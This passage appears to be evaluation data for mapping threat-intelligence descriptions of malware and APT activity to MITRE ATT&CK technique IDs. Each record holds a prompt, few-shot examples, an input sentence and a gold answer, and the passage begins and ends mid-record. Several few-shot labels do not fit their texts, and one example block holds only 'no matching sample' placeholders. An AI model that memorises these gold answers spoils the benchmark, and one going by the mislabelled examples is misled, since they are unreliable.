"You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Additional Features The Zyklon malware offers the following additional capabilities (via plugins): Browser Password Recovery Zyklon HTTP can recover passwords from popular web browsers, including: Google Chrome Mozilla Firefox Internet Explorer Opera Browser Chrome Canary/SXS CoolNovo Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser FTP Password Recovery Zyklon currently supports FTP password recovery from the following FTP applications: FileZilla SmartFTP FlashFXP FTPCommander Dreamweaver WS_FTP Gaming Software Key Recovery Zyklon can recover PC Gaming software keys from the following games: Battlefield Call of Duty FIFA NFS Age of Empires Quake The Sims Half-Life IGI Star Wars Email Password Recovery Zyklon may also collect email passwords from following applications: Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail, Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager License Key Recovery The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero\n\t - T1003: OS Credential Dumping\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: In what appears to be a first on the cyber-espionage scene, a nation-state-backed hacking group has used a Google Chrome extension to infect victims and steal passwords and cookies from their browsers\n\t - T1176: Browser Extensions\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: RTM has used search order hijacking to force TeamViewer to load a malicious DLL.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "Empire can use various modules to search for files containing passwords.", + "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EXOTIC LILY has used malicious links to lure users into executing malicious payloads.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1204.001: User Execution - Malicious Link\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "Evilnum has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: tools attempt to spoof anti-virus processes as a means of self-defense.\n\t - T1036: Masquerading\n- Text: From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info \u2026which in turn invokes various macOS APIs such as getlogin and gethostname\n\t - T1620: Reflective Code Loading\n- Text: RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "TA551 has masked malware DLLs as dat and jpg files.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mis-Type has temporarily stored collected information to the files `\u201c%AppData%\\{Unique Identifier}\\HOSTRURKLSR\u201d` and `\u201c%AppData%\\{Unique Identifier}\\NEWERSSEMP\u201d`.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool\n\t - T1036: Masquerading\n- Text: The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker\u2019s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim\u2019s system\n\t - T1083: File and Directory Discovery\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "MuddyWater has stored a decoy PDF file within a victim's `%temp%` folder.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.\n\t - T1204.002: User Execution - Malicious File\n- Text: ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n", + "input": "Heyoka Backdoor has been spread through malicious document lures.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On June 21st, 2017 an attacker breached one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network\n\t - T1110: Brute Force\n- Text: Chimera has used credential stuffing against victim's remote services to obtain valid accounts.\n\t - T1110.004: Brute Force - Credential Stuffing\n- Text: PoshC2 contains a module for taking packet captures on compromised hosts.\n\t - T1040: Network Sniffing\n", + "input": "DarkVishnya used brute-force attack to obtain login data.", + "gold": "- T1110: Brute Force", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1027: Obfuscated Files or Information\n\t - T1204.002: User Execution - Malicious File\n\t - T1221: Template Injection\n- Text: REvil can decode encrypted strings to enable execution of commands and payloads.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "Valak has used packed DLL payloads.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: At face value, ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. The first execution of ISMInjector starts by copying itself to %localappdata%\\srvBS.txt and enables persistent access to the system\n\t - T1027: Obfuscated Files or Information\n- Text: LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom.\n\t - T1486: Data Encrypted for Impact\n", + "input": "Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately1500 bytes (after decrypting it with XOR 0x45\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Exaramel has a command to download a file from a remote server to execute.\n\t - T1105: Ingress Tool Transfer\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n", + "input": "YAHOYAH decrypts downloaded files before execution.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: Windows AppLocker allows administrators to control which executable files are denied or authorized to execute. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. A number of legitimate Windows executables that are not blocked by the default AppLocker policies has been discovered and various proof of concept AppLocker bypass code became publicly available. Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. To bypass AppLocker and launching script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. It takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when invoked through a call placed within the <xsl:value-of> tag. Invoking the JScript code of the payload dropper within an XSL file The supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis\n\t - T1220: XSL Script Processing\n- Text: The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "Higaisa used JavaScript to execute additional files.", + "gold": "- T1059.007: Command and Scripting Interpreter - JavaScript", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: SideCopy has sent spearphishing emails with malicious hta file attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script\n\t - T1036: Masquerading\n\t - T1064: Scripting\n", + "input": "Lazarus Group has used DOCX files to retrieve a malicious document template/DOTM file.", + "gold": "- T1221: Template Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kevin can hide the current window from the targeted user via the `ShowWindow` API function.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: MCMD has the ability to remove set Registry Keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "MCMD can modify processes to prevent them from being visible on the desktop.", + "gold": "- T1564.003: Hide Artifacts - Hidden Window", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SamSam uses custom batch scripts to execute some of its components.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: can execute commands using a shell.\n\t - T1059: Command and Scripting Interpreter\n- Text: Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AADInternals can check for the existence of user email addresses using public Microsoft APIs.\n\t - T1589.002: Gather Victim Identity Information - Email Addresses\n- Text: LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.\n\t - T1589: Gather Victim Identity Information\n- Text: 2. The perpetrators distributed PlugX messages to employees- personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group-s initial presence on corporate workstations.\n\t - T1114: Email Collection\n\t - T1598: Phishing for Information\n", + "input": "Magic Hound has acquired the personal email addresses of some individuals they intend to target.", + "gold": "- T1589.002: Gather Victim Identity Information - Email Addresses", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1498\n- Text: No matching sample found for T1498.001\n- Text: No matching sample found for T1499.001\n", + "input": "Lucifer can execute TCP, UDP, and HTTP denial of service (DoS) attacks.", + "gold": "- T1498: Network Denial of Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1036: Masquerading\n- Text: ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.\n\t - T1036.003: Masquerading - Rename System Utilities\n", + "input": "Ramsay has masqueraded as a 7zip installer.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can extract its agent from the body of a malicious document.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u201cscheduler\u201d plugin uses it to decompress executable payloads from the C&C\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: During C0015, the threat actors used Base64-encoded strings.\n\t - T1027: Obfuscated Files or Information\n", + "input": "Kimsuky has decoded malicious VBScripts using Base64.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: obtains a list of running processes on the victim.\n\t - T1057: Process Discovery\n- Text: Hydraq creates a backdoor through which remote attackers can monitor services.\n\t - T1007: System Service Discovery\n- Text: may collect information the victim's anti-virus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "MoonWind has a command to return a list of running processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrongPity can exfiltrate collected documents through C2 channels.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: HEXANE has used cloud services, including OneDrive, for C2.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Felismus can download files from remote servers.\n\t - T1105: Ingress Tool Transfer\n", + "input": "BoxCaon uploads files and data from a compromised host over the existing C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems\n\t - T1105: Ingress Tool Transfer\n- Text: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.\n\t - T1221: Template Injection\n- Text: Wizard Spider has used stolen credentials to copy tools into the \"%TEMP%\" directory of domain controllers.\n\t - T1570: Lateral Tool Transfer\n", + "input": "certutil can be used to download files from a given URL.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon execution, this Trojan checks to see if it was configured with \u201cBINDERON\u201d to determine if it should extract an embedded payload from a resource named \u201cB\u201d, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: Chinoxy has encrypted its configuration file.\n\t - T1027: Obfuscated Files or Information\n- Text: Equation has been observed utilizing environmental keying in payload delivery.\n\t - T1480.001: Execution Guardrails - Environmental Keying\n", + "input": "PS1 can use an XOR key to decrypt a PowerShell loader and payload binary.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: Cobalt Strike can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution.\n\t - T1021.003: Remote Services - Distributed Component Object Model\n- Text: REvil can use WMI to monitor for and kill specific processes listed in its configuration file.\n\t - T1047: Windows Management Instrumentation\n", + "input": "HermeticWizard can execute files on remote machines using DCOM.", + "gold": "- T1559.001: Inter-Process Communication - Component Object Model", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using \"msiexec\".\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: The NETWIRE binary has been executed via PowerShell script.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Molerats has used msiexec.exe to execute an MSI payload.", + "gold": "- T1218.007: System Binary Proxy Execution - Msiexec", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 moved laterally via RDP.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.\n\t - T1021.005: Remote Services - VNC\n- Text: The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim\u2019s machine. The path to the log file is hard-coded in the payload file, as shown here\n\t - T1219: Remote Access Software\n", + "input": "HEXANE has used remote desktop sessions for lateral movement.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from 